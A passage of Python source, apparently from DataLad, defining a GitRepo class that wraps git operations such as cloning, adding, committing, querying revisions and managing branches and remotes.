summary:\n flags |= cls.ERROR\n elif \"[new tag]\" in summary:\n flags |= cls.NEW_TAG\n elif \"[new branch]\" in summary:\n flags |= cls.NEW_HEAD\n # up-to-date encoded in control character\n else:\n # fast-forward or forced update - was encoded in control character,\n # but we parse the old and new commit\n split_token = \"...\"\n if control_character == \" \":\n split_token = \"..\"\n old_sha, _new_sha = summary.split(' ')[0].split(split_token)\n # have to use constructor here as the sha usually is abbreviated\n old_commit = old_sha\n # END message handling\n\n return cls(\n from_ref=from_ref_string.strip(),\n to_ref=to_ref_string.strip(),\n # convert flag int into a list of operation labels\n operations=[\n cls._operation_map[o]\n for o in cls._operation_map.keys()\n if flags & o\n ],\n note=summary.strip(),\n old_commit=old_commit,\n )\n\n\nInfoT = TypeVar(\"InfoT\", FetchInfo, PushInfo)\n\n\nclass GitAddOutput(TypedDict):\n file: str\n success: bool\n\n\n@path_based_str_repr\nclass GitRepo(CoreGitRepo):\n \"\"\"Representation of a git repository\n\n \"\"\"\n # We must check git config to have name and email set, but\n # should do it once\n _config_checked = False\n\n GIT_MIN_VERSION = \"2.19.1\"\n git_version = None\n\n @classmethod\n def _check_git_version(cls) -> None:\n external_versions.check(\"cmd:git\", min_version=cls.GIT_MIN_VERSION)\n cls.git_version = external_versions['cmd:git']\n\n # This is the least common denominator to claim that a user\n # used DataLad.\n # Citing JOSS publication https://joss.theoj.org/papers/10.21105/joss.03262\n @due.dcite(Doi(\"10.21105/joss.03262\"),\n # override path since there is no need ATM for such details\n path=\"datalad\",\n description=\"DataLad - Data management and distribution platform\")\n def __init__(self, path: str, runner: Any = None, create: bool = True,\n git_opts: Optional[dict[str, Any]] = None, repo: Any = None,\n fake_dates: bool = False, create_sanity_checks: bool = True,\n **kwargs: Any) -> None:\n \"\"\"Creates representation of git repository at `path`.\n\n Can also be used to create a git repository at `path`.\n\n Parameters\n ----------\n path: str\n path to the git repository; In case it's not an absolute path,\n it's relative to PWD\n create: bool, optional\n if true, creates a git repository at `path` if there is none. Also\n creates `path`, if it doesn't exist.\n If set to false, an exception is raised in case `path` doesn't exist\n or doesn't contain a git repository.\n repo: git.Repo, optional\n This argument is ignored.\n create_sanity_checks: bool, optional\n Whether to perform sanity checks during initialization (when\n `create=True` and target path is not a valid repo already), such as\n that new repository is not created in the directory where git already\n tracks some files.\n kwargs:\n keyword arguments serving as additional options to the git-init\n command. Therefore, it makes sense only if called with `create`.\n\n Generally, this way of passing options to the git executable is\n (or will be) used a lot in this class. It's a transformation of\n python-style keyword arguments (or a `dict`) to command line arguments,\n provided by GitPython.\n\n A single character keyword will be prefixed by '-', multiple characters\n by '--'. An underscore in the keyword becomes a dash. The value of the\n keyword argument is used as the value for the corresponding command\n line argument. Assigning a boolean creates a flag.\n\n Examples:\n no_commit=True => --no-commit\n C='/my/path' => -C /my/path\n\n \"\"\"\n # this will set up .pathobj and .dot_git\n super().__init__(path)\n\n if self.git_version is None:\n self._check_git_version()\n\n # BEGIN Repo validity test\n # We want to fail early for tests, that would be performed a lot. In\n # particular this is about GitRepo.is_valid_repo. We would use the\n # latter to decide whether or not to call GitRepo() only for __init__ to\n # then test the same things again. If we fail early we can save the\n # additional test from outer scope.\n self.path = path\n\n # Note, that the following three path objects are used often and\n # therefore are stored for performance. Path object creation comes with\n # a cost. Most notably, this is used for validity checking of the\n # repository.\n _valid_repo = self.is_valid_git()\n\n do_create = False\n if create and not _valid_repo:\n if repo is not None:\n # `repo` passed with `create`, which doesn't make sense\n raise TypeError(\"argument 'repo' must not be used with 'create'\")\n do_create = True\n else:\n # Note: We used to call gitpy.Repo(path) here, which potentially\n # raised NoSuchPathError or InvalidGitRepositoryError. This is\n # used by callers of GitRepo.__init__() to detect whether we have a\n # valid repo at `path`. Now, with switching to lazy loading property\n # `repo`, we detect those cases without instantiating a\n # gitpy.Repo().\n\n if not exists(path):\n raise NoSuchPathError(path)\n if not _valid_repo:\n raise InvalidGitRepositoryError(path)\n # END Repo validity test\n\n # So that we \"share\" control paths with git/git-annex\n if ssh_manager:\n ssh_manager.ensure_initialized()\n\n # note: we may also want to distinguish between a path to the worktree\n # and the actual repository\n\n if git_opts is None:\n git_opts = {}\n if kwargs:\n git_opts.update(kwargs)\n\n self._cfg = None\n\n if do_create: # we figured it out earlier\n from_cmdline = git_opts.pop('_from_cmdline_', [])\n self.init(\n sanity_checks=create_sanity_checks,\n init_options=from_cmdline + to_options(True, **git_opts),\n )\n\n # with DryRunProtocol path might still not exist\n self.inode: Optional[int]\n if exists(self.path):\n self.inode = os.stat(self.path).st_ino\n else:\n self.inode = None\n\n if fake_dates:\n self.configure_fake_dates()\n\n @property\n def bare(self) -> bool:\n \"\"\"Returns a bool indicating whether the repository is bare\n\n Importantly, this is not reporting the configuration value\n of 'core.bare', in order to be usable at a stage where a\n Repo instance is not yet equipped with a ConfigManager.\n Instead, it is testing whether the repository path and its\n \"dot_git\" are identical. The value of 'core.bare' can be query\n from the ConfigManager in a fully initialized instance.\n \"\"\"\n return self.pathobj == self.dot_git\n\n @classmethod\n def clone(cls, url: str, path: str, *args: Any, clone_options: Optional[list[str] | dict[str, Option]] = None, **kwargs: Any) -> Self:\n \"\"\"Clone url into path\n\n Provides workarounds for known issues (e.g.\n https://github.com/datalad/datalad/issues/785)\n\n Parameters\n ----------\n url : str\n path : str\n clone_options : dict or list\n Arbitrary options that will be passed on to the underlying call to\n `git-clone`. This may be a list of plain options or key-value pairs\n that will be converted to a list of plain options with `to_options`.\n expect_fail : bool\n Whether expect that command might fail, so error should be logged then\n at DEBUG level instead of ERROR\n kwargs:\n Passed to the Repo class constructor.\n \"\"\"\n\n if 'repo' in kwargs:\n raise TypeError(\"argument 'repo' conflicts with cloning\")\n # TODO: what about 'create'?\n\n expect_fail = kwargs.pop('expect_fail', False)\n # fail early on non-empty target:\n from os import listdir\n if exists(path) and listdir(path):\n raise ValueError(\n \"destination path '%s' already exists and is not an \"\n \"empty directory.\" % path)\n else:\n # protect against cloning into existing and obviously dangling\n # instance for that location\n try:\n del cls._unique_instances[path]\n except KeyError:\n # didn't exist - all fine\n pass\n\n # Massage URL\n url_ri = RI(url) if not isinstance(url, RI) else url\n if on_windows:\n # When we're cloning from a local path on Windows, the URL at\n # this point is platform-specific (e.g., \"..\\\\origin\"). According \n # to Git clone's manpage, clone urls can't have backslashes.\n # While Git does manage to clone a URL with backslashes, \n # in the case of subdatasets cloned from relative paths it nevertheless\n # messed up the resulting remote url, resulting in a mix of\n # front and backslashes (see also gh-7180): \n # 'C:/Users/adina/AppData/Local/Temp/datalad_temp_frvczceh/ds/..\\\\origin' \n # Therefore, we're turning it to Posix now.\n if isinstance(url_ri, PathRI):\n url = Path(url).as_posix()\n url_ri = PathRI(url)\n\n else:\n # if we are on windows, the local path of a URL\n # would not end up being a proper local path and cloning\n # would fail. Don't try to be smart and just pass the\n # URL along unmodified\n\n # try to get a local path from `url`:\n try:\n url = url_ri.localpath\n url_ri = RI(url)\n except ValueError:\n pass\n\n if is_ssh(url_ri):\n ssh_manager.get_connection(url).open()\n else:\n if isinstance(url_ri, PathRI):\n # expand user, because execution not going through a shell\n # doesn't work well otherwise\n new_url = os.path.expanduser(url)\n if url != new_url:\n lgr.info(\"Expanded source path to %s from %s\", new_url, url)\n url = new_url\n\n cmd = cls._git_cmd_prefix + ['clone', '--progress']\n if clone_options:\n if isinstance(clone_options, Mapping):\n clone_options = to_options(True, **clone_options)\n cmd.extend(clone_options)\n cmd.extend([url, path])\n\n fix_annex = None\n ntries = 5 # 3 is not enough for robust workaround\n for trial in range(ntries):\n try:\n lgr.debug(\"Git clone from %s to %s\", url, path)\n\n res = GitWitlessRunner().run(cmd, protocol=GitProgress)\n # fish out non-critical warnings by git-clone\n # (empty repo clone, etc.), all other content is logged\n # by the progress helper to 'debug'\n for errline in res['stderr'].splitlines():\n if errline.startswith('warning:'):\n lgr.warning(errline[8:].strip())\n lgr.debug(\"Git clone completed\")\n break\n except CommandError as e:\n # log here but let caller decide what to do\n ce = CapturedException(e)\n str_e = str(e)\n # see https://github.com/datalad/datalad/issues/785\n if re.search(\"Request for .*aborted.*Unable to find\", str_e,\n re.DOTALL) \\\n and trial < ntries - 1:\n lgr.info(\n \"Hit a known issue with Git (see GH#785). Trial #%d, \"\n \"retrying\",\n trial)\n continue\n #(lgr.debug if expect_fail else lgr.error)(e_str)\n\n if \"Clone succeeded, but checkout failed.\" in str_e:\n fix_annex = ce\n break\n\n raise\n\n # get ourselves a repository instance\n gr = cls(path, *args, **kwargs)\n if fix_annex:\n # cheap check whether we deal with an AnnexRepo - we can't check the class of `gr` itself, since we then\n # would need to import our own subclass\n if hasattr(gr, 'is_valid_annex'):\n lgr.warning(\"Experienced issues while cloning. \"\n \"Trying to fix it, using git-annex-fsck.\")\n if not gr.is_initialized():\n gr._init()\n gr.fsck()\n else:\n lgr.warning(\"Experienced issues while cloning: %s\", fix_annex)\n # ensure that Git doesn't mangle relative paths into obscure absolute\n # paths: https://github.com/datalad/datalad/issues/3538\n if isinstance(url_ri, PathRI):\n url_path = Path(url)\n if not url_path.is_absolute():\n # get git-created path\n remote_url = 'remote.' + gr.get_remotes()[0] + '.url'\n git_url = gr.config.get(remote_url)\n if Path(git_url).is_absolute():\n # Git created an absolute path from a relative URL.\n git_url = op.relpath(git_url, gr.path)\n # always in POSIX even on Windows\n path = Path(git_url).as_posix()\n gr.config.set(remote_url, path,\n scope='local', force=True)\n return gr\n\n # Note: __del__ shouldn't be needed anymore as we switched to\n # `weakref.finalize`.\n # https://docs.python.org/3/library/weakref.html#comparing-finalizers-with-del-methods\n #\n # Keeping both methods and this comment around as a reminder to not\n # use __del__, if we figure there's a need for cleanup in the future.\n #\n # def __del__(self):\n # # unbind possibly bound ConfigManager, to prevent all kinds of weird\n # # stalls etc\n # self._cfg = None\n\n def is_valid_git(self) -> bool:\n \"\"\"Returns whether the underlying repository appears to be still valid\n\n Note, that this almost identical to the classmethod is_valid_repo().\n However, if we are testing an existing instance, we can save Path object\n creations. Since this testing is done a lot, this is relevant. Creation\n of the Path objects in is_valid_repo() takes nearly half the time of the\n entire function.\n\n Also note, that this method is bound to an instance but still\n class-dependent, meaning that a subclass cannot simply overwrite it.\n This is particularly important for the call from within __init__(),\n which in turn is called by the subclasses' __init__. Using an overwrite\n would lead to the wrong thing being called.\n \"\"\"\n return self.is_valid()\n\n @classmethod\n def is_valid_repo(cls, path: str) -> bool:\n \"\"\"Returns if a given path points to a git repository\"\"\"\n return cls.is_valid(path)\n\n @staticmethod\n def get_git_dir(repo: str | GitRepo) -> str:\n \"\"\"figure out a repo's gitdir\n\n '.git' might be a directory, a symlink or a file\n\n Note\n ----\n This method is likely to get deprecated, please use GitRepo.dot_git instead!\n That one's not static, but it's cheaper and you should avoid\n not having an instance of a repo you're working on anyway.\n Note, that the property in opposition to this method returns an absolute path.\n\n\n Parameters\n ----------\n repo: path or Repo instance\n currently expected to be the repos base dir\n\n Returns\n -------\n str\n relative path to the repo's git dir; So, default would be \".git\"\n \"\"\"\n if isinstance(repo, GitRepo):\n return str(repo.dot_git)\n pathobj = Path(repo)\n dot_git = _get_dot_git(pathobj, ok_missing=False)\n try:\n dot_git = dot_git.relative_to(pathobj)\n except ValueError:\n # is not a subpath, return as is\n lgr.debug(\"Path %r is not subpath of %r\", dot_git, pathobj)\n return str(dot_git)\n\n @property\n def config(self):\n # just proxy the core repo APIs property for backward-compatibility\n return self.cfg\n\n def is_with_annex(self) -> bool:\n \"\"\"Report if GitRepo (assumed) has (remotes with) a git-annex branch\n \"\"\"\n return any(\n b['refname:strip=2'] == 'git-annex' or b['refname:strip=2'].endswith('/git-annex')\n for b in self.for_each_ref_(fields='refname:strip=2', pattern=['refs/heads', 'refs/remotes'])\n )\n\n @classmethod\n def get_toppath(cls, path: str, follow_up: bool = True, git_options: Optional[list[str]] = None) -> Optional[str]:\n \"\"\"Return top-level of a repository given the path.\n\n Parameters\n -----------\n follow_up : bool\n If path has symlinks -- they get resolved by git. If follow_up is\n True, we will follow original path up until we hit the same resolved\n path. If no such path found, resolved one would be returned.\n git_options: list of str\n options to be passed to the git rev-parse call\n\n Return None if no parent directory contains a git repository.\n \"\"\"\n cmd = ['git']\n if git_options:\n cmd.extend(git_options)\n cmd += [\"rev-parse\", \"--show-toplevel\"]\n try:\n out = GitWitlessRunner(cwd=path).run(\n cmd, protocol=StdOutErrCapture)\n assert isinstance(out, dict)\n toppath = out['stdout'].rstrip('\\n\\r')\n except CommandError:\n return None\n except OSError:\n toppath = GitRepo.get_toppath(dirname(path), follow_up=follow_up,\n git_options=git_options)\n\n # normalize the report, because, e.g. on windows it can come out\n # with improper directory separators (C:/Users/datalad)\n toppath = str(Path(toppath))\n\n if follow_up:\n path_ = path\n path_prev = \"\"\n while path_ and path_ != path_prev: # on top /.. = /\n if str(Path(path_).resolve()) == toppath:\n toppath = path_\n break\n path_prev = path_\n path_ = dirname(path_)\n\n return toppath\n\n @normalize_paths\n def add(self, files: list[str], git: bool = True, git_options: Optional[list[str]] = None, update: bool = False) -> list[GitAddOutput]:\n \"\"\"Adds file(s) to the repository.\n\n Parameters\n ----------\n files: list\n list of paths to add\n git: bool\n somewhat ugly construction to be compatible with AnnexRepo.add();\n has to be always true.\n update: bool\n --update option for git-add. From git's manpage:\n Update the index just where it already has an entry matching\n <pathspec>. This removes as well as modifies index entries to match\n the working tree, but adds no new files.\n\n If no <pathspec> is given when --update option is used, all tracked\n files in the entire working tree are updated (old versions of Git\n used to limit the update to the current directory and its\n subdirectories).\n\n Returns\n -------\n list\n Of status dicts.\n \"\"\"\n # under all circumstances call this class' add_ (otherwise\n # AnnexRepo.add would go into a loop\n return list(GitRepo.add_(self, files, git=git, git_options=git_options,\n update=update))\n\n def add_(self, files: list[str], git: bool = True, git_options: Optional[list[str]] = None, update: bool = False) -> Iterator[GitAddOutput]:\n \"\"\"Like `add`, but returns a generator\"\"\"\n # TODO: git_options is used as options for the git-add here,\n # instead of options to the git executable => rename for consistency\n\n if not git:\n lgr.warning(\n 'GitRepo.add() called with git=%s, this should not happen',\n git)\n git = True\n\n # there is no other way then to collect all files into a list\n # at this point, because we need to pass them at once to a single\n # `git add` call\n files = [_normalize_path(self.path, f) for f in ensure_list(files) if f]\n\n if not (files or git_options or update):\n # wondering why just a warning? in cmdline this is also not an error\n lgr.warning(\"add was called with empty file list and no options.\")\n return\n\n try:\n # without --verbose git 2.9.3 add does not return anything\n add_out = self._call_git(\n # Set annex.gitaddtoannex to prevent storing files in\n # annex with a v6+ annex repo.\n ['-c', 'annex.gitaddtoannex=false', 'add'] +\n ensure_list(git_options) +\n to_options(update=update) + ['--verbose'],\n files=files,\n pathspec_from_file=True,\n read_only=False,\n )\n # get all the entries\n for o in self._process_git_get_output(*add_out):\n yield o\n # Note: as opposed to git cmdline, force is True by default in\n # gitpython, which would lead to add things, that are\n # ignored or excluded otherwise\n # 2. Note: There is an issue with globbing (like adding '.'),\n # which apparently doesn't care for 'force' and therefore\n # adds '.git/...'. May be it's expanded at the wrong\n # point in time or sth. like that.\n # For now, use direct call to git add.\n #self.cmd_call_wrapper(self.repo.index.add, files, write=True,\n # force=False)\n # TODO: May be make use of 'fprogress'-option to indicate\n # progress\n # But then, we don't have it for git-annex add, anyway.\n #\n # TODO: Is write=True a reasonable way to do it?\n # May be should not write until success of operation is\n # confirmed?\n # What's best in case of a list of files?\n except OSError as e:\n lgr.error(\"add: %s\", e)\n raise\n\n # Make sure return value from GitRepo is consistent with AnnexRepo\n # currently simulating similar return value, assuming success\n # for all files:\n # TODO: Make return values consistent across both *Repo classes!\n return\n\n @staticmethod\n def _process_git_get_output(stdout: str | bytes, stderr: Any = None) -> list[GitAddOutput]:\n \"\"\"Given both outputs (stderr is ignored atm) of git add - process it\n\n Primarily to centralize handling in both indirect annex and direct\n modes when ran through proxy\n \"\"\"\n return [{'file': f, 'success': True}\n for f in re.findall(\"'(.*)'[\\n$]\", ensure_unicode(stdout))]\n\n @normalize_paths(match_return_type=False)\n def remove(self, files: list[str], recursive: bool = False, **kwargs: Option) -> list[str]:\n \"\"\"Remove files.\n\n Calls git-rm.\n\n Parameters\n ----------\n files: list of str\n list of paths to remove\n recursive: False\n whether to allow recursive removal from subdirectories\n kwargs:\n see `__init__`\n\n Returns\n -------\n [str]\n list of successfully removed files.\n \"\"\"\n if recursive:\n kwargs['r'] = True\n\n # the name is chosen badly, but the purpose is to make sure that\n # any pending operations actually manifest themselves in the Git repo\n # on disk (in case of an AnnexRepo, it could be pending batch\n # processes that need closing)\n self.precommit()\n\n # output per removed file is expected to be \"rm 'PATH'\":\n return [\n line.strip()[4:-1]\n for line in self.call_git_items_(\n ['rm'] + to_options(True, **kwargs), files=files, pathspec_from_file=True)\n ]\n\n def precommit(self) -> None:\n \"\"\"Perform pre-commit maintenance tasks\n \"\"\"\n # we used to clean up GitPython here\n pass\n\n @staticmethod\n def _get_prefixed_commit_msg(msg: Optional[str]) -> str:\n DATALAD_PREFIX = \"[DATALAD]\"\n return DATALAD_PREFIX if not msg else \"%s %s\" % (DATALAD_PREFIX, msg)\n\n def configure_fake_dates(self) -> None:\n \"\"\"Configure repository to use fake dates.\n \"\"\"\n lgr.debug(\"Enabling fake dates\")\n self.config.set(\"datalad.fake-dates\", \"true\")\n\n @property\n def fake_dates_enabled(self) -> bool:\n \"\"\"Is the repository configured to use fake dates?\n \"\"\"\n # this turned into a private property of the CoreGitRepo\n return self._fake_dates_enabled\n\n def add_fake_dates(self, env):\n # was renamed in CoreGitRepo\n return self.add_fake_dates_to_env(env)\n\n def commit(self, msg: Optional[str] = None,\n options: Optional[list[str]] = None, _datalad_msg: bool = False,\n careless: bool = True, files: Optional[list[str]] = None,\n date: Optional[str] = None, index_file: Optional[str] = None) -> None:\n \"\"\"Commit changes to git.\n\n Parameters\n ----------\n msg: str, optional\n commit-message\n options: list of str, optional\n cmdline options for git-commit\n _datalad_msg: bool, optional\n To signal that commit is automated commit by datalad, so\n it would carry the [DATALAD] prefix\n careless: bool, optional\n if False, raise when there's nothing actually committed;\n if True, don't care\n files: list of str, optional\n path(s) to commit\n date: str, optional\n Date in one of the formats git understands\n index_file: str, optional\n An alternative index to use\n \"\"\"\n\n self.precommit()\n\n # assemble commandline\n cmd = ['commit']\n options = ensure_list(options)\n\n if date:\n options += [\"--date\", date]\n\n orig_msg = msg\n if not msg:\n if '--amend' in options:\n if '--no-edit' not in options:\n # don't overwrite old commit message with our default\n # message by default, but re-use old one. In other words:\n # Make --no-edit the default:\n options += [\"--no-edit\"]\n else:\n msg = 'Recorded changes'\n _datalad_msg = True\n\n if _datalad_msg:\n msg = self._get_prefixed_commit_msg(msg)\n\n if msg:\n options += [\"-m\", msg]\n cmd.extend(options)\n\n # set up env for commit\n env = self.add_fake_dates(None) \\\n if self.fake_dates_enabled else os.environ.copy()\n if index_file:\n env['GIT_INDEX_FILE'] = index_file\n\n lgr.debug(\"Committing via direct call of git: %s\", cmd)\n\n prev_sha = self.get_hexsha()\n\n # Old code was doing clever --amend'ing of chunked series of commits manually\n # here, but with pathspec_from_file it is no longer needed.\n # store pre-commit state to be able to check if anything was committed\n try:\n # Note: call_git operates via joining call_git_items_ and that one wipes out\n # .stdout from exception and collects/repopulates stderr only. Let's use\n # _call_git which returns both outputs and collects/re-populates both stdout\n # **and** stderr\n _ = self._call_git(\n cmd,\n files=files,\n env=env,\n pathspec_from_file=True,\n )\n except CommandError as e:\n # real errors first\n if \"did not match any file(s) known to git\" in e.stderr:\n raise FileNotInRepositoryError(\n cmd=e.cmd,\n msg=\"File(s) unknown to git\",\n code=e.code,\n filename=linesep.join([\n l for l in e.stderr.splitlines()\n if l.startswith(\"error: pathspec\")\n ])\n )\n # behavior choices now\n elif not careless:\n # not willing to compromise at all\n raise\n elif 'nothing to commit' in e.stdout:\n lgr.debug(\"nothing to commit in %s. Ignored.\", self)\n elif 'no changes added to commit' in e.stdout or \\\n 'nothing added to commit' in e.stdout:\n lgr.debug(\"no changes added to commit in %s. Ignored.\", self)\n else:\n raise\n if orig_msg \\\n or '--dry-run' in cmd \\\n or prev_sha == self.get_hexsha() \\\n or ('--amend' in cmd and '--no-edit' in cmd) \\\n or (not is_interactive()) \\\n or self.config.obtain('datalad.save.no-message') != 'interactive':\n # we had a message given, or nothing was committed, or prev. commit\n # was amended, or we are not connected to a terminal, or no\n # interactive message input is desired:\n # we can go home\n return\n\n # handle interactive message entry by running another `git-commit`\n self._git_runner.run(\n self._git_cmd_prefix + cmd + ['--amend', '--edit'],\n protocol=NoCapture,\n stdin=None,\n env=env,\n )\n\n # TODO usage is only in the tests, consider making a test helper and\n # remove from GitRepo API\n def get_indexed_files(self) -> list[str]:\n \"\"\"Get a list of files in git's index\n\n Returns\n -------\n list\n list of paths rooting in git's base dir\n \"\"\"\n\n return [\n str(r.relative_to(self.pathobj))\n for r in self.get_content_info(\n paths=None, ref=None, untracked='no')\n ]\n\n def format_commit(self, fmt: str, commitish: Optional[str] = None) -> Optional[str]:\n \"\"\"Return `git show` output for `commitish`.\n\n Parameters\n ----------\n fmt : str\n A format string accepted by `git show`.\n commitish: str, optional\n Any commit identifier (defaults to \"HEAD\").\n\n Returns\n -------\n str or, if there are not commits yet, None.\n \"\"\"\n # use git-log and not git-show due to faster performance with\n # complex commits (e.g. octopus merges)\n # https://github.com/datalad/datalad/issues/4801\n cmd = ['log', '-1', '-z', '--format=' + fmt]\n if commitish is not None:\n cmd.append(commitish + \"^{commit}\")\n # make sure Git takes our argument as a revision\n cmd.append('--')\n try:\n stdout = self.call_git(\n cmd, expect_stderr=True, expect_fail=True,\n read_only=True)\n except CommandError as e:\n if 'bad revision' in e.stderr:\n raise ValueError(\"Unknown commit identifier: %s\" % commitish)\n elif 'does not have any commits yet' in e.stderr:\n return None\n else:\n raise e\n # This trailing null is coming from the -z above, which avoids the\n # newline that Git would append to the output. We could drop -z and\n # strip the newline directly, but then we'd have to worry about\n # compatibility across platforms.\n return stdout.rsplit(\"\\0\", 1)[0]\n\n def get_hexsha(self, commitish: Optional[str] = None, short: bool = False) -> Optional[str]:\n \"\"\"Return a hexsha for a given commitish.\n\n Parameters\n ----------\n commitish : str, optional\n Any identifier that refers to a commit (defaults to \"HEAD\").\n short : bool, optional\n Return the abbreviated form of the hexsha.\n\n Returns\n -------\n str or, if no commitish was given and there are no commits yet, None.\n\n Raises\n ------\n ValueError\n If a commitish was given, but no corresponding commit could be\n determined.\n \"\"\"\n # use --quiet because the 'Needed a single revision' error message\n # that is the result of running this in a repo with no commits\n # isn't useful to report\n cmd = ['rev-parse', '--quiet', '--verify', '{}^{{commit}}'.format(\n commitish if commitish else 'HEAD')\n ]\n if short:\n cmd.append('--short')\n try:\n return self.call_git_oneline(cmd, read_only=True)\n except CommandError as e:\n if commitish is None:\n return None\n raise ValueError(\"Unknown commit identifier: %s\" % commitish)\n\n @normalize_paths(match_return_type=False)\n def get_last_commit_hexsha(self, files: list[str]) -> Optional[str]:\n \"\"\"Return the hash of the last commit the modified any of the given\n paths\"\"\"\n try:\n commit = self.call_git(\n ['rev-list', '-n1', 'HEAD'],\n files=files,\n expect_fail=True,\n read_only=True,\n )\n commit = commit.strip()\n return commit if commit else None\n except CommandError:\n if self.get_hexsha() is None:\n # unborn branch, don't freak out\n return None\n raise\n\n def get_revisions(self, revrange: str | list[str] | None = None, fmt: str = \"%H\", options: Optional[list[str]] = None) -> list[str]:\n \"\"\"Return list of revisions in `revrange`.\n\n Parameters\n ----------\n revrange : str or list of str or None, optional\n Revisions or revision ranges to walk. If None, revision defaults to\n HEAD unless a revision-modifying option like `--all` or\n `--branches` is included in `options`.\n fmt : string, optional\n Format accepted by `--format` option of `git log`. This should not\n contain new lines because the output is split on new lines.\n options : list of str, optional\n Options to pass to `git log`. This should not include `--format`.\n\n Returns\n -------\n List of revisions (str), formatted according to `fmt`.\n \"\"\"\n if revrange is None:\n revrange = []\n elif isinstance(revrange, str):\n revrange = [revrange]\n\n cmd = [\"log\", \"--format={}\".format(fmt)]\n cmd.extend((options or []) + revrange + [\"--\"])\n try:\n stdout = self.call_git(cmd, expect_fail=True, read_only=True)\n except CommandError as e:\n if \"does not have any commits\" in e.stderr:\n return []\n raise\n return stdout.splitlines()\n\n def commit_exists(self, commitish: str) -> bool:\n \"\"\"Does `commitish` exist in the repo?\n\n Parameters\n ----------\n commitish : str\n A commit or an object that can be dereferenced to one.\n\n Returns\n -------\n bool\n \"\"\"\n # Note: The peeling operator \"^{commit}\" is required so that rev-parse\n # doesn't succeed if passed a full hexsha that is valid but doesn't\n # exist.\n return self.call_git_success(\n [\"rev-parse\", \"--verify\", commitish + \"^{commit}\"],\n read_only=True,\n )\n\n def get_merge_base(self, commitishes: str | list[str]) -> Optional[str]:\n \"\"\"Get a merge base hexsha\n\n Parameters\n ----------\n commitishes: str or list of str\n List of commitishes (branches, hexshas, etc) to determine the merge\n base of. If a single value provided, returns merge_base with the\n current branch.\n\n Returns\n -------\n str or None\n If no merge-base for given commits, or specified treeish doesn't\n exist, None returned\n \"\"\"\n if isinstance(commitishes, str):\n commitishes = [commitishes]\n if not commitishes:\n raise ValueError(\"Provide at least a single value\")\n elif len(commitishes) == 1:\n branch = self.get_active_branch()\n if branch is None:\n raise ValueError(\"Single commitish provided and no active branch\")\n commitishes = commitishes + [branch]\n\n try:\n base = self.call_git_oneline(['merge-base'] + commitishes,\n read_only=True)\n except CommandError as exc:\n if exc.code == 1 and not (exc.stdout or exc.stderr):\n # No merge base was found (unrelated commits).\n return None\n if \"fatal: Not a valid object name\" in exc.stderr:\n return None\n raise\n\n return base\n\n def is_ancestor(self, reva: str, revb: str) -> bool:\n \"\"\"Is `reva` an ancestor of `revb`?\n\n Parameters\n ----------\n reva, revb : str\n Revisions.\n\n Returns\n -------\n bool\n \"\"\"\n return self.call_git_success(\n [\"merge-base\", \"--is-ancestor\", reva, revb],\n read_only=True)\n\n def get_commit_date(self, branch: Optional[str] = None, date: str = 'authored') -> Optional[int]:\n \"\"\"Get the date stamp of the last commit (in a branch or head otherwise)\n\n Parameters\n ----------\n date: {'authored', 'committed'}\n Which date to return. \"authored\" will be the date shown by \"git show\"\n and the one possibly specified via --date to `git commit`\n\n Returns\n -------\n int or None\n None if no commit\n \"\"\"\n if date == 'committed':\n format = '%ct'\n elif date == 'authored':\n format = '%at'\n else:\n raise ValueError('unknow date type: {}'.format(date))\n d = self.format_commit(format, commitish=branch)\n return int(d) if d else None\n\n def get_active_branch(self) -> Optional[str]:\n \"\"\"Get the name of the active branch\n\n Returns\n -------\n str or None\n Returns None if there is no active branch, i.e. detached HEAD,\n and the branch name otherwise.\n \"\"\"\n try:\n out = self.call_git([\"symbolic-ref\", \"HEAD\"], expect_fail=True,\n read_only=True)\n except CommandError as e:\n if 'HEAD is not a symbolic ref' in e.stderr:\n lgr.debug(\"detached HEAD in %s\", self)\n return None\n else:\n raise e\n return out.strip()[11:] # strip refs/heads/\n\n def get_corresponding_branch(self, branch: Any = None) -> Optional[str]:\n \"\"\"Always returns None, a plain GitRepo has no managed branches\"\"\"\n return None\n\n def get_branches(self) -> list[str]:\n \"\"\"Get all branches of the repo.\n\n Returns\n -------\n [str]\n Names of all branches of this repository.\n \"\"\"\n\n return [\n b['refname:strip=2']\n for b in self.for_each_ref_(fields='refname:strip=2', pattern='refs/heads')\n ]\n\n def get_remote_branches(self) -> list[str]:\n \"\"\"Get all branches of all remotes of the repo.\n\n Returns\n -----------\n [str]\n Names of all remote branches.\n \"\"\"\n # TODO: Reconsider melting with get_branches()\n\n # TODO: treat entries like this: origin/HEAD -> origin/master'\n # currently this is done in collection\n\n return [\n b['refname:strip=2']\n for b in self.for_each_ref_(fields='refname:strip=2', pattern='refs/remotes')\n ]\n\n def get_remotes(self, with_urls_only: bool = False) -> list[str]:\n \"\"\"Get known remotes of the repository\n\n Parameters\n ----------\n with_urls_only : bool, optional\n return only remotes which have urls\n\n Returns\n -------\n remotes : list of str\n List of names of the remotes\n \"\"\"\n from datalad.utils import unique\n\n self.config.reload()\n remotes = unique([x[7:] for x in self.config.sections()\n if x.startswith(\"remote.\")])\n\n if with_urls_only:\n remotes = [\n r for r in remotes\n if self.config.get('remote.%s.url' % r)\n ]\n return remotes\n\n # TODO this is practically unused outside the tests, consider turning\n # into a test helper and trim from the API\n def get_files(self, branch: Optional[str] = None) -> list[str]:\n \"\"\"Get a list of files in git.\n\n Lists the files in the (remote) branch.\n\n Parameters\n ----------\n branch: str\n Name of the branch to query. Default: active branch.\n\n Returns\n -------\n [str]\n list of files.\n \"\"\"\n return [\n str(p.relative_to(self.pathobj))\n for p in self.get_content_info(\n paths=None, ref=branch, untracked='no')\n ]\n\n def add_remote(self, name: str, url: str, options: Optional[list[str]] = None) -> tuple[str, str]:\n \"\"\"Register remote pointing to a url\n \"\"\"\n cmd = ['remote', 'add']\n if options:\n cmd += options\n cmd += [name, url]\n\n # for historical reasons this method returns stdout and\n # stderr, keeping that for now\n result = self._call_git(cmd)\n self.config.reload()\n return result\n\n def remove_remote(self, name: str) -> None:\n \"\"\"Remove existing remote\n \"\"\"\n\n # TODO: testing and error handling!\n from .exceptions import RemoteNotAvailableError\n try:\n self.call_git(['remote', 'remove', name])\n except CommandError as e:\n if 'No such remote' in e.stderr:\n raise RemoteNotAvailableError(name,\n cmd=\"git remote remove\",\n msg=\"No such remote\",\n stdout=e.stdout,\n stderr=e.stderr)\n else:\n raise e\n\n # config.reload necessary, because the associated remote config\n # will vanish\n self.config.reload()\n return\n\n def _maybe_open_ssh_connection(self, remote: Optional[str], prefer_push: bool = True) -> None:\n \"\"\"Open connection if `remote` has an SSH URL.\n\n Doing so enables SSH caching, preventing datalad-sshrun subprocesses\n from opening (and 